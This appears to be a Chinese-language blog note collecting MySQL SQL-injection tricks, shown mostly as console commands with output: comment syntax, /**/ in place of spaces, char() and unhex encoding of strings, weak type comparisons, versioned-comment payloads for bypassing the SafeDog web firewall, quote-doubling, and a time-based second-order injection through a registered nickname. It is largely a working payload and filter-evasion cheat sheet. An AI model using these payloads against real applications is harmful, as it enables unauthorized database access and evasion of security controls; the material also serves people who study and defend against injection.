sql注入时易被忽略的语法技巧以及二次注入
那些容易被忽略、容易被弄错的地方
sql注入时的技巧
=========================================================================
* 如果单引号被转义,在当前数据库采用GBK编码的前提下,可以考虑双字节注入。
* 注释符的正确用法
“-- ”才是mysql中的注释,注意后面有个空格
mysql> select user() from (select 1)x where '1'='1';-- '
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
“#”注释,后面接不接空格无所谓
mysql> select user() from (select 1) x where '1'='1';#'
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
* 用/**/替代空格
mysql> select/**/1;
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)
* sql语句中字符串转义
- mysql> select char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 );
+-------------------------------------------------------------------+
| char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 ) |
+-------------------------------------------------------------------+
| /tmp/f_user.txt |
+-------------------------------------------------------------------+
1 row in set (0.00 sec)
- mysql> select concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) ;
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| /tmp/f_user.txt |
+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
# utf-8
- mysql> select unhex('E6B8B8E5AEA2');
+-----------------------+
| unhex('E6B8B8E5AEA2') |
+-----------------------+
| 游客 |
+-----------------------+
1 row in set (0.00 sec)
* 数字和字符的比较,类似php中的弱类型
- mysql> select '10asfasfdeasdfasdf'=10;
+-------------------------+
| '10asfasfdeasdfasdf'=10 |
+-------------------------+
| 1 |
+-------------------------+
- mysql> select '0esfsadf'=0;
+--------------+
| '0esfsadf'=0 |
+--------------+
| 1 |
+--------------+
* 绕过安全狗
** 正则绕过
- select 1/*!50000union/*!*//*!50000select/*!*/2;
+---+
| 1 |
+---+
| 1 |
| 2 |
+---+
- mysql> select/*/#\*/1;
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)
* 多个单引号相连时,最外层两个孤独单引号配对闭合,中间的连续偶数个单引号中每两个一组换算成一个。
- mysql> select '123''';
+------+
| 123' |
+------+
| 123' |
+------+
1 row in set (0.00 sec)
- mysql> select '123''''';
+-------+
| 123'' |
+-------+
| 123'' |
+-------+
- mysql> select user from mysql.user where user='nickname'' and password=' or sleep(0.1);#'
Empty set (1.00 sec)
此特点可以引发“二次注入”,比如,注册用户时输入昵称{nickname'},被转义为{nickname\'}但在插入到数据库后被还原,
那么在需要将昵称作为查询条件的页面中就存在二次注入,另一个条件字段的值为{ or 0=sleep(1);#}即可触发。
自助者天助;自天佑之,吉无不利。
